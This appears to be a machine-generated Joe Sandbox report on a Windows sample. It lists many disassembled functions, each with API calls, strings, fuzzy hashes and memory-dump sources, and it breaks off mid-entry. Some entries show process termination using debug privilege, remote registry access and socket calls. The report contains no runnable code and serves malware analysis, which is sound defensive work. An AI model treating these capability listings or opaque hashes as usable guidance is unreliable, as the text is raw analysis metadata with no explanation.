                                                                    • Opcode ID: 9f6b570b3a51271e31605ef7a8c44be6857f11cf3716a320d9d55bc5a369fb19
                                                                    • Instruction ID: 96770bde61cf08d5dce314fdd869729277b243bc2a3a95d5d57bdce687f426ad
                                                                    • Opcode Fuzzy Hash: 9f6b570b3a51271e31605ef7a8c44be6857f11cf3716a320d9d55bc5a369fb19
                                                                    • Instruction Fuzzy Hash: 4D01B6B5240309BFEB20ABA5DC4DF6B3BACEB89711F408411FA45DB295CA799800CB25
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: NULL Pointer assignment$Not an Object type
                                                                    • API String ID: 0-572801152
                                                                    • Opcode ID: e6e109b6f6b5a5390ef60eb28037f22e828978e98ffe018f13fbe44756e4069d
                                                                    • Instruction ID: fd48ebd3c5273a1948910264a39633f8c3604dd3b60d4e5a463464fa68a18492
                                                                    • Opcode Fuzzy Hash: e6e109b6f6b5a5390ef60eb28037f22e828978e98ffe018f13fbe44756e4069d
                                                                    • Instruction Fuzzy Hash: E5C183B1A0021A9BDF20DF59C884AAFB7F5FB48318F148479E985AB281E7719945CB90
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Variant$ClearInit$_memset
                                                                    • String ID: Incorrect Object type in FOR..IN loop$Null Object assignment in FOR..IN loop
                                                                    • API String ID: 2862541840-625585964
                                                                    • Opcode ID: 67d2c070cdc89bb2f92d7861162c65cbfdeef42ac6d122dac95267a05e42e154
                                                                    • Instruction ID: 1e4bd05a28d53828f684dd490e5d53da6a5edab667a183190efdc103ab70aabf
                                                                    • Opcode Fuzzy Hash: 67d2c070cdc89bb2f92d7861162c65cbfdeef42ac6d122dac95267a05e42e154
                                                                    • Instruction Fuzzy Hash: A79194B1A00205ABDF24DF95C888FAFBBB8EF49715F008179F555AB281D7709901CFA0
                                                                    APIs
                                                                      • Part of subcall function 0102710A: CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?,?,01027455), ref: 01027127
                                                                      • Part of subcall function 0102710A: ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027142
                                                                      • Part of subcall function 0102710A: lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?,?), ref: 01027150
                                                                      • Part of subcall function 0102710A: CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,01027044,80070057,?), ref: 01027160
                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000002,00000003,00000000,00000000,00000000,?,?,?), ref: 01049806
                                                                    • _memset.LIBCMT ref: 01049813
                                                                    • _memset.LIBCMT ref: 01049956
                                                                    • CoCreateInstanceEx.OLE32(?,00000000,00000015,?,00000001,00000000), ref: 01049982
                                                                    • CoTaskMemFree.OLE32(?), ref: 0104998D
                                                                    Strings
                                                                    • NULL Pointer assignment, xrefs: 010499DB
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                                    • String ID: NULL Pointer assignment
                                                                    • API String ID: 1300414916-2785691316
                                                                    • Opcode ID: 24b779143ec6cf9a47f62b5609734a98799178d02054196baf8e3a1067e75225
                                                                    • Instruction ID: 6df166ff50e51a187317747fd7622486371941895d9b929b7af070c8786bc704
                                                                    • Opcode Fuzzy Hash: 24b779143ec6cf9a47f62b5609734a98799178d02054196baf8e3a1067e75225
                                                                    • Instruction Fuzzy Hash: 70914AB1D00219EBDF10DFA5DC84EDEBBB9BF08314F10416AE559A7281EB759A44CFA0
                                                                    APIs
                                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 01056E24
                                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 01056E38
                                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 01056E52
                                                                    • _wcscat.LIBCMT ref: 01056EAD
                                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 01056EC4
                                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 01056EF2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$Window_wcscat
                                                                    • String ID: SysListView32
                                                                    • API String ID: 307300125-78025650
                                                                    • Opcode ID: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
                                                                    • Instruction ID: 5dd860c67c00879a3e52313bd5215fe0ac0e420b92da30000d10e3f4da78e8a0
                                                                    • Opcode Fuzzy Hash: 602b4b16253ad1d756cc0e473053dc49aecc29e8f5eafc030d974c84b8f01ed4
                                                                    • Instruction Fuzzy Hash: F341A370900349ABEB619F68CC45BEF77E9EF08350F50046AF9C497191D6769984CB60
                                                                    APIs
                                                                      • Part of subcall function 01033C55: CreateToolhelp32Snapshot.KERNEL32 ref: 01033C7A
                                                                      • Part of subcall function 01033C55: Process32FirstW.KERNEL32(00000000,?), ref: 01033C88
                                                                      • Part of subcall function 01033C55: CloseHandle.KERNEL32(00000000), ref: 01033D52
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9A4
                                                                    • GetLastError.KERNEL32 ref: 0104E9B7
                                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0104E9E6
                                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 0104EA63
                                                                    • GetLastError.KERNEL32(00000000), ref: 0104EA6E
                                                                    • CloseHandle.KERNEL32(00000000), ref: 0104EAA3
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                                    • String ID: SeDebugPrivilege
                                                                    • API String ID: 2533919879-2896544425
                                                                    • Opcode ID: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
                                                                    • Instruction ID: 6668dc5ad36f655dac17d3cdf3bf83c8c075e5f40d15566c96dd77d2e2697cc6
                                                                    • Opcode Fuzzy Hash: 07036f79ba27721a30a28d95be100212a5fd6c1797eef6fa9a1989df6b6fda3c
                                                                    • Instruction Fuzzy Hash: A041AC702042019FDB21EF54CC94F6EBBA5BF80714F088459F9829B3C2CBB9A814DB91
                                                                    APIs
                                                                    • LoadIconW.USER32(00000000,00007F03), ref: 01033033
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: IconLoad
                                                                    • String ID: blank$info$question$stop$warning
                                                                    • API String ID: 2457776203-404129466
                                                                    • Opcode ID: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
                                                                    • Instruction ID: 5c85fa966a1aceb86f144f148f1f986c9a6024e541f9a00df29eeed629812376
                                                                    • Opcode Fuzzy Hash: 8700a3b795317d258e1adadcd1eae4daf7df308a45a4b65dc5b31bbfcfaedec6
                                                                    • Instruction Fuzzy Hash: 5F112B3534C34ABEE7159A59DCD2C6FBBDCAF55320B10406AFA80AE182DB755A4056A0
                                                                    APIs
                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 01034312
                                                                    • LoadStringW.USER32(00000000), ref: 01034319
                                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 0103432F
                                                                    • LoadStringW.USER32(00000000), ref: 01034336
                                                                    • _wprintf.LIBCMT ref: 0103435C
                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0103437A
                                                                    Strings
                                                                    • %s (%d) : ==> %s: %s %s, xrefs: 01034357
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                                    • API String ID: 3648134473-3128320259
                                                                    • Opcode ID: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
                                                                    • Instruction ID: f08482e0275acc221b7c5effc7a3da2f3358f4bdc438e22ff796e574b0b22e57
                                                                    • Opcode Fuzzy Hash: 350b8be224b9220bc52fe645e4722d1d5020843c655aef1a8a4b6189a9e32a49
                                                                    • Instruction Fuzzy Hash: E00162F2900309BFE761ABA4DD89EFB776CEB08200F404595BB85E6005EA7D5E854B74
                                                                    APIs
                                                                      • Part of subcall function 00FD2612: GetWindowLongW.USER32(?,000000EB), ref: 00FD2623
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0105D47C
                                                                    • GetSystemMetrics.USER32(0000000F), ref: 0105D49C
                                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 0105D6D7
                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 0105D6F5
                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 0105D716
                                                                    • ShowWindow.USER32(00000003,00000000), ref: 0105D735
                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 0105D75A
                                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 0105D77D
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                                    • String ID:
                                                                    • API String ID: 1211466189-0
                                                                    • Opcode ID: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
                                                                    • Instruction ID: 26a5b0b235c8815c23b15a2f6130cb94c212c354b479b67704fb47d40c79201e
                                                                    • Opcode Fuzzy Hash: 2f4789f7a0a14ed6a609ffe12303bafff3db7bb86eda16902f1127358c6565c5
                                                                    • Instruction Fuzzy Hash: 2DB19D71500219EBDF94CFA8C5857AE7BF1FF08701F0480AAED889F299E735A950CB60
                                                                    APIs
                                                                      • Part of subcall function 00FD7DE1: _memmove.LIBCMT ref: 00FD7E22
                                                                      • Part of subcall function 01050E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0104FDAD,?,?), ref: 01050E31
                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0104FDEE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                                    • String ID:
                                                                    • API String ID: 3479070676-0
                                                                    • Opcode ID: 5eb2837b8fdf1dc29cf82dfb5408832fa6ccdbf5ded5b957c7cde43527d1ffa5
                                                                    • Instruction ID: 34522cbedcfa490bde3c70ce137d0df605226b28ca7d9559e0e7e012a644c1d9
                                                                    • Opcode Fuzzy Hash: 5eb2837b8fdf1dc29cf82dfb5408832fa6ccdbf5ded5b957c7cde43527d1ffa5
                                                                    • Instruction Fuzzy Hash: D7A18D712042029FDB10EF18C894F6EBBE5AF85314F08885DF9968B292DB79E945DF42
                                                                    APIs
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 00FD2ACF
                                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000,000000FF), ref: 00FD2B17
                                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C21A
                                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,0100C1C7,00000004,00000000,00000000,00000000), ref: 0100C286
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: ShowWindow
                                                                    • String ID:
                                                                    • API String ID: 1268545403-0
                                                                    • Opcode ID: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
                                                                    • Instruction ID: 915719e7844dfe76929f84c03c893c2da92b74f3710856fc725086621cac5395
                                                                    • Opcode Fuzzy Hash: 1fcf1c9cfd519bb81035f8d78a8f711b86fe6dcce52524e46a73f23ffbcf17f0
                                                                    • Instruction Fuzzy Hash: 3C41FD317087809AE7B65B288D88B6B7B93FBA5310F5C854BE18786790C67E9841F790
                                                                    APIs
                                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 010370DD
                                                                      • Part of subcall function 00FF0DB6: std::exception::exception.LIBCMT ref: 00FF0DEC
                                                                      • Part of subcall function 00FF0DB6: __CxxThrowException@8.LIBCMT ref: 00FF0E01
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 01037114
                                                                    • EnterCriticalSection.KERNEL32(?), ref: 01037130
                                                                    • _memmove.LIBCMT ref: 0103717E
                                                                    • _memmove.LIBCMT ref: 0103719B
                                                                    • LeaveCriticalSection.KERNEL32(?), ref: 010371AA
                                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 010371BF
                                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 010371DE
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                    • String ID:
                                                                    • API String ID: 256516436-0
                                                                    • Opcode ID: ad39d9f9a1996e2db0b5b227f1dbdcae6e8a9867bf78f19d334b3850943641c2
                                                                    • Instruction ID: 925195b4e83c94d8e58495f847d79ac48a4f74d0e55678610d1eae5a49b9fe5e
                                                                    • Opcode Fuzzy Hash: ad39d9f9a1996e2db0b5b227f1dbdcae6e8a9867bf78f19d334b3850943641c2
                                                                    • Instruction Fuzzy Hash: 1831A376900206EBCF10DFA8DC859AFBBB9EF45310F1440A5EA449B256DB399A10DB60
                                                                    APIs
                                                                    • DeleteObject.GDI32(00000000), ref: 010561EB
                                                                    • GetDC.USER32(00000000), ref: 010561F3
                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 010561FE
                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0105620A
                                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 01056246
                                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 01056257
                                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0105902A,?,?,000000FF,00000000,?,000000FF,?), ref: 01056291
                                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 010562B1
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                    • String ID:
                                                                    • API String ID: 3864802216-0
                                                                    • Opcode ID: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
                                                                    • Instruction ID: 92ce285cf8fb2e0cb5ea39b3f612e6da27df7a9e0b74231c061d610fc85d2d00
                                                                    • Opcode Fuzzy Hash: a2cf56f1dcef5aac9f64cf8832768b6c6df0d4f2a0964fc6b99bf6828a7268b4
                                                                    • Instruction Fuzzy Hash: 11319F721002107FEB218F64CC8AFEB3FA9EF49761F040055FE88DA191C67A9841CB74
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _memcmp
                                                                    • String ID:
                                                                    • API String ID: 2931989736-0
                                                                    • Opcode ID: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
                                                                    • Instruction ID: 7a33d955e3797514b2ba63eb5af1cb990132d630ca8e6f2db2ba2cff51c13717
                                                                    • Opcode Fuzzy Hash: ec16b1931cde2cf7747c4c0626e3c5bcc0b54bca747e1ab0aba686e699129290
                                                                    • Instruction Fuzzy Hash: 9E215B7170122EBBE215B6169D42FFF779CAE61368F084024FF849B647EB68DE10C1A5
                                                                    APIs
                                                                      • Part of subcall function 00FD9837: __itow.LIBCMT ref: 00FD9862
                                                                      • Part of subcall function 00FD9837: __swprintf.LIBCMT ref: 00FD98AC
                                                                      • Part of subcall function 00FEFC86: _wcscpy.LIBCMT ref: 00FEFCA9
                                                                    • _wcstok.LIBCMT ref: 0103EC94
                                                                    • _wcscpy.LIBCMT ref: 0103ED23
                                                                    • _memset.LIBCMT ref: 0103ED56
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063229575.0000000001097000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_0_2_fd0000_ref_97024130865.jbxd
                                                                    Similarity
                                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                    • String ID: X
                                                                    • API String ID: 774024439-3081909835
                                                                    • Opcode ID: 961ae336a7777dcc38f8aada80e564cd3f0ae5e620df09f5fb2facea08da6fa1
                                                                    • Instruction ID: 6f67105a132224d6eb6a7fb4a09a26bbe7b294d20df9f9e435675b56f3eac345
                                                                    • Opcode Fuzzy Hash: 961ae336a7777dcc38f8aada80e564cd3f0ae5e620df09f5fb2facea08da6fa1
                                                                    • Instruction Fuzzy Hash: CBC18D315083019FC754FF68C885A6EB7E5AF85310F08496EF9D99B3A2DB74E805DB82
                                                                    APIs
                                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 01046C00
                                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 01046C21
                                                                    • WSAGetLastError.WSOCK32(00000000), ref: 01046C34
                                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 01046CEA
                                                                    • inet_ntoa.WSOCK32(?), ref: 01046CA7
                                                                      • Part of subcall function 0102A7E9: _strlen.LIBCMT ref: 0102A7F3
                                                                      • Part of subcall function 0102A7E9: _memmove.LIBCMT ref: 0102A815
                                                                    • _strlen.LIBCMT ref: 01046D44
                                                                    • _memmove.LIBCMT ref: 01046DAD
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.2062920816.0000000000FD1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00FD0000, based on PE: true
                                                                    • Associated: 00000000.00000002.2062862638.0000000000FD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.000000000105F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063036515.0000000001084000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000000.00000002.2063170437.000000000108E000.00000004.00000001.01000000.00000003.sdmpDownload File
